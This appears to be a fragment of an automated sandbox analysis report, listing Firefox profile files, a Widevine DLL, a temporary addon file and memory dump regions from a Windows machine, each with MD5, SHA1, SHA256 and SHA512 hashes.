C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | c71d75af8d0f8889d4709a98ecf876f5 |
| SHA1 | f3cba58335cf14086a092387dd32722b606b2006 |
| SHA256 | 8a0ca6866ec8eba35b72f86178f9ef958b2ad4a4471630324781ec72cf2babf3 |
| SHA512 | 71f4c974b03a899deb84101e85bf5112db4e5c59f09addf854c90dd1e5ba2cab3d8014cd668900657e4ae6228459617cb412136e0b7a95fc76b7d1e8a565ca0c |
memory/3144-1665-0x00000000057A0000-0x0000000005AF4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | d2303d182670507a56ef52e72937dd2e |
| SHA1 | 2fe438e399d0dc621ce59a23114dca8875ae86b0 |
| SHA256 | ca71e0255cf8cce40e65a86f4e96fab5e8593e30a183b38739276f02ceab96a8 |
| SHA512 | 72520c5edc8bf3e904faeaeaa245a082c231b97a5e443973763117b325bc9aa65aaff287b9fba54b912b5c8d95d940418c0e569fa7a0b89f9568bda380945316 |
memory/3144-1628-0x00000000056C0000-0x0000000005726000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 7266db00c0486bc19357f7e9322e3605 |
| SHA1 | 726fc4a7f529b7e3bf8b06e5288eff0813c5d23b |
| SHA256 | b48a371936b11bec59a8848d78837e0f8da5a74746007f88b00819da84661010 |
| SHA512 | 67534a7d83607dfe3b9ffa398b6c4551039860a27e9d35f2aacf28a4ea78f3c60c97d7f6ce9f44ff0ec37d57142000ca7d398a734d9395f2c47184b19473a78a |
memory/3144-1709-0x0000000005DE0000-0x0000000005E2C000-memory.dmp
memory/3144-1702-0x0000000005DC0000-0x0000000005DDE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | effaec199bfdce25de21a1f4612a9dec |
| SHA1 | a110d73b5df5bd3418ea0e5d26c75edfc5c0c0e3 |
| SHA256 | f385c2cee37e68b46680c455b151be6200b35041e4432c5dc79800efa6eefdd2 |
| SHA512 | 7f5a1ff06bb01e076b8d5756319c58b1efe54170dd3207b35316ed94a2533cfa4e96be6909dd4945564c6b974d55489cc0f3b9c35a4217aab8cb6b7ccfc3df1a |